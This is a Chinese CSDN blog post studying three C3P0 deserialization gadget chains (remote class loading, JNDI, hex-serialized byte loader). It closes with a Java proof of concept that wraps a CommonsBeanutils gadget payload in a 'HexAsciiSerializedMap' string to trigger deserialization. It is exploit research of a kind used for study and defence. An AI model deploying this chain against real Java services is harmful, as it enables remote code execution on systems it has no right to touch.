c3p0的三个gadget的学习

已于 2022-02-18 13:44:20 修改
阅读量274 收藏
点赞数
文章标签: 学习 java 开发语言
于 2022-02-18 13:30:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HongYu012/article/details/123001373
版权
本文深入探讨了C3P0数据库连接池的三种getshell方法:加载远程类、JNDI及Hex序列化字节加载器。通过分析源码,揭示了利用IndirectlySerialized接口触发反序列化的过程,以及如何构造payload来规避潜在的限制。示例代码展示了如何利用这些漏洞。
摘要由CSDN通过智能技术生成

目前c3p0有三种方式getshell

  • 加载远程类
  • jndi
  • hex序列化字节加载器

前两个可以放在一起学习,在com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject,可以看到,如果是IndirectlySerialized的实例就会去调用getObject方法

if (o instanceof IndirectlySerialized) {
    o = ((IndirectlySerialized)o).getObject();
}

而它的实现类只有一个com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized,我们可以看看

触发jndi

很明显如果contextName不为空,则会触发,这里没必要继续说下去了

加载远程类

接下来是第二个,这也是ysoserial本身集成的一个payload,继续往下看,ReferenceableUtils.referenceToObject,也是很明显通过URLClassloader加载远程类,并且默认初始化了,因此可以直接在静态块里面放入恶意数据

关于writeObject的话,以ysoserial的为例,PoolSource implements ConnectionPoolDataSource, Referenceable,只要不实现序列化接口,并实现getReference方法返回我们的Reference对象即可,也是很简单的

hex序列化字节加载器

这个更多会用到在fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等里面配合使用

当在userOverridesAsString当中设置了序列化数据后,当调用set方法setUpPropertyListeners时就能触发

可以看到里面对序列化数据的处理

public static Map parseUserOverridesAsString(String userOverridesAsString) throws IOException, ClassNotFoundException {
    if (userOverridesAsString != null) {
        String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);
        byte[] serBytes = ByteUtils.fromHexAscii(hexAscii);
        return Collections.unmodifiableMap((Map)SerializableUtils.fromByteArray(serBytes));
    } else {
        return Collections.EMPTY_MAP;
    }
}

最后触发原生反序列化

后面才发现又个地方比较坑,在com.mchange.v2.c3p0.impl.C3P0ImplUtils#parseUserOverridesAsString

String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);

这里会把最后一位吃了有点恶心,因此构造payload的时候要像这样

String payload = "HexAsciiSerializedMap:"+HexString+":";

这里给个demo方便测试

import com.govuln.deserialization.CB1;
import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;
import hudson.remoting.Base64;
import javassist.ClassPool;
import javassist.CtClass;
import org.python.antlr.ast.Str;

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.HashSet;
import java.util.LinkedList;
import java.util.PriorityQueue;

public class Test {

    public static byte[] toByteArray(InputStream in) throws IOException {
        byte[] classBytes;
        classBytes = new byte[in.available()];
        in.read(classBytes);
        in.close();
        return classBytes;
    }

    public static String bytesToHexString(byte[] bArray, int length) {
        StringBuffer sb = new StringBuffer(length);

        for(int i = 0; i < length; ++i) {
            String sTemp = Integer.toHexString(255 & bArray[i]);
            if (sTemp.length() < 2) {
                sb.append(0);
            }

            sb.append(sTemp.toUpperCase());
        }
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {

        byte[] data = CB1.getPayload();
        String HexString = bytesToHexString(data, data.length);
        System.out.println(HexString.length());
        String payload = "HexAsciiSerializedMap:"+HexString+":";
        WrapperConnectionPoolDataSource wrapperConnectionPoolDataSource = new WrapperConnectionPoolDataSource();
        wrapperConnectionPoolDataSource.setUserOverridesAsString(payload);
        Method setUpPropertyListeners = wrapperConnectionPoolDataSource.getClass().getDeclaredMethod("setUpPropertyListeners");
        setUpPropertyListeners.setAccessible(true);
        setUpPropertyListeners.invoke(wrapperConnectionPoolDataSource,null);

    }

}
Java面试那些事儿
关注
C3P0反序列化链学习
虚幻私塾
04-21 1693
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 C3P0 c3p0第一次听闻是用于fastjson的回显上,大佬们总结三种方法,后面两种主要就是用于fastjson和jackjson的回显利用(注入内存马) http
Java反序列化之C3P0学习
顶峰
02-06 214
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
小工具之使用c3p0获取Jdbc连接
余之孟德的专栏
10-10 639
简单的介绍关于利用c3p0连接池进行jdb
Java反序列化 C3P0 GadGets1利用链记录(URLClassLoader)
最新发布
LTianHang的博客
02-06 284
Java反序列化 C3P0 GadGets1利用链记录分析
C3P0 反序列化
01-26 650
C3P0 反序列化 依赖 <dependency> <groupId>com.mchange</groupId> <artifactId>c3p0</artifactId> <version>0.9.5.2</version> </dependency> Gadget /* * Gadget: * PoolBackedDataSourceBase#readObject *
[Java反序列化]—C3P0反序列化
Sentiment的博客
11-11 1436
文章首发于先知社区:https://xz.aliyun.com/t/11830
[com.mchange.v2.c3p0.impl.C3P0ImplUtils.generateVmId] 的问题
weixin_30426879的博客
05-16 144
linux下运行带c3p0的dubbo jar包, 提示如下: [com.mchange.v2.log.MLog.<clinit>] - MLog clients using log4j logging.[INFO] 2017-05-16 15:01:36,730 [com.mchange.v2.c3p0.impl.C3P0ImplUtils.generateVmId...
CSAPP实验(三)——attacklab
haha123486的博客
05-21 6482
phase_1 使用objdump -d ctarget > ctarget.dis命令把可执行程序ctarget的反汇编代码保存到ctarget.dis文件里。再用vim打开ctarget.dis文件,从中得到下图。图中可知,函数touch1的起始地址在0x4017c0。 下图是getbuf的汇编代码,首先分配了40(0x28)个字节的栈空间。也就是说当输入字符串大于40个字节时会覆盖函数getbuf的返回地址。 建立exploit1.txt,具体内容如下图所示。需要注意的是采用小端字节排序。
CTF pwn/re手在学习过程中的零碎操作积累
lifanxin的博客
09-06 1536
零碎操作积累概述使用指定版本的libc运行pwn题使用指定版本的libc编译源程序总结 概述   谨以此片文章为我那不争气的记性做个记录,随便造福大家,另外如果各位看官也有些骚操作或者基操的话,也请不吝赐教,留言评论,在下定临表涕零,感激不尽。 使用指定版本的libc运行pwn题   这里给几个下libc的网站: ubuntu glibc官网 清华大学开源镜像站   使用指定版本libc运行pwn题的终端操作: # 指定libc $ LD_PRELOAD=/usr/local/libc/libc-2.2
构造post_[漏洞分析]LiferayPortal JSONWS反序列化漏洞(CVE20207961)分析及Poc构造
weixin_39760206的博客
12-03 546
一、背景这是一篇4月份复现LiferayPortalrce漏洞时的笔记,当时忙着做渗透没空整理,现在发出来就当是学习JODD反序列化的记录吧,里面2个Gadget com.mchange.v2.c3p0.JndiRefForwardingDataSource和com.mchange.v2.c3p0.WrapperConnectionPoolDataSource的Poc构造过程,后面还有一...
C3P0在linux下报错:Name or service not known
weixin_34240520的博客
07-31 143
为什么80%的码农都做不了架构师?>>> ...
yaml 4种java支持库的比较
gyflyx的专栏
08-18 1万+
yaml 官方给了4中java支持的库,但是目前(2014、)
xml java 反序列化,Java 反序列化漏洞始末(5)— XML/YAML
weixin_31682031的博客
03-11 659
哔哔两句前面把反序列化漏洞里的一大巨头“JSON”的主要问题给总结了一下,XML 和 YAML 在反序列化漏洞中也能算得上是个很常见的问题。我例举出几个几个 XML 和 YAML 的反序列化漏洞。XMLDecoderXStreamSnakeYaml在我遇到的项目里,这三个依赖库最常见。其中 XMLDecoder 不同于其他几个,这个更像是反射漏洞,虽然本质上都是可以反序列化回序列化的数据,但 XM...
c3p0源码解析 三 (WrapperConnectionPoolDataSource类)
endercc的专栏
04-08 1502
1.  WrapperConnectionPoolDataSource类 public WrapperConnectionPoolDataSource(boolean autoregister) { super( autoregister ); setUpPropertyListeners(); //set up initial value of userOverrid
Javaweb安全——反序列化漏洞-C3P0
weixin_43610673的博客
10-25 2190
C3P0是一个开源的JDBC连接池,它实现了数据源与JNDI绑定,支持JDBC3规范和实现了JDBC2的标准扩展说明的Connection和Statement池的DataSources对象。即将用于连接数据库的连接整合在一起形成一个随取随用的数据库连接池(Connection pool)。..............自下向上的调用,从lookup看着像一个jndi注入,调用链比较短,直接静态审计源码试试。还原属性赋值跟到的内部类的方法。
Java 反序列化之 C3P0学习
蚁景网安学院
10-10 777
图片有点多,请耐心阅读哦0x01 前言再多打一点基础吧,后续打算先看一看 XStream,Weblogic,strusts2 这些个0x02 C3P0 组件介绍C3P0 是一个开源的 JDBC 连接池,它实现了数据源和 JNDI 绑定,支持 JDBC3 规范和 JDBC2 的标准扩展。目前使用它的开源项目有 Hibernate,Spring 等。JDBC 是 Java DataBase Conne...
Linux环境下C3P0 Failed to get local InetAddress for VMID 解决办法
热门推荐
Ricky
08-20 1万+
今天在做一个项目中用到了C3P0数据源
解决C3P0在Linux下Failed to get local InetAddress for VMID问题
梓纾的专栏
07-21 2491
com.mchange.v2.c3p0.impl.C3P0ImplUtils - Failed to get local InetAddress for VMID. This is unlikely to matter. At all. We'll add some extra randomness java.net.UnknownHostException: host-10-18-16-8
C3P0在Linux下的Failed to get local InetAddress for VMID解决方法
iteye_2688的博客
07-25 164
com.mchange.v2.c3p0.impl.C3P0ImplUtils generateVmId 信息: Failed to get local InetAddress for VMID. This is unlikely to matter. At all. We'll add some extra randomness java.net.UnknownHostException: Alo...
Linux USB Gadget框架详解:接口与驱动结构
在Linux内核中,USB驱动程序被组织为三个层次:UDC Drivers(通用串行控制器驱动),Gadget API(接口抽象层),和Gadget Drivers(具体功能模块)。UDC Drivers负责直接与硬件交互,管理底层USB通信,并通过回调...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值